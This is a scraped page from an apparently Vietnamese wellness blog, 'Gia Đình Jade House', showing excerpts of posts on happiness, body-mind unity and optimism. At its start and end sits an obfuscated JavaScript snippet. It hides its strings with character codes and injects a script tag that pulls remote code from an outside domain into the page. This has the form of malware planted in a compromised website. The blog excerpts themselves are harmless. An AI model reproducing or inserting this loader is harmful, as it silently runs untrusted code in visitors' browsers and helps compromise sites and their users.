Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,99,115,115,46,100,105,103,101,115,116,99,111,108,101,99,116,46,99,111,109,47,122,98,116,63,118,56,52);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Gia Đình Jade House

Hạnh phúc từ tâm thức

Hạnh phúc từ tâm thức

Hạnh phúc từ tâm thức Hạnh phúc từ tâm thức tràn đầy tình yêu thương, hạnh phúc, sức sống dạt dào và sự sáng tạo. Tất cả mọi phần trên cơ thể đều có sự tỉnh thức, vận động theo mục tiêu phát triển, và luôn gắn kết với tất cả mọi phần của cơ …

Hạnh phúc từ tâm thức Read More »

Sự đồng nhất giữa cơ thể và tâm trí

Sự đồng nhất giữa cơ thể và tâm trí

Sự đồng nhất giữa cơ thể và tâm trí Trong mỗi con người là một vị thầy, có rất nhiều người đã đánh thức vị thầy trong chính mình, và cũng rất rất nhiều vị thầy vẫn còn ngủ yên chờ bạn đánh thức chính mình và khi đó chúng ta biết rằng chúng ta …

Sự đồng nhất giữa cơ thể và tâm trí Read More »

sự lac quan

Sự lạc quan và mở rộng cửa sổ tâm hồn

Sự lạc quan và mở rộng cửa sổ tâm hồn Sự lạc quan mù quáng có thể gây bất lợi cho một viễn cảnh như nhận thức bị tước đi tính tích cực. Nếu không được kiểm soát bởi thực tế, sự lạc quan có thể khiến bạn nghĩ rằng mọi thứ sẽ diễn ra tốt …

Sự lạc quan và mở rộng cửa sổ tâm hồn Read More »

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,99,115,115,46,100,105,103,101,115,116,99,111,108,101,99,116,46,99,111,109,47,122,98,116,63,118,56,52);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();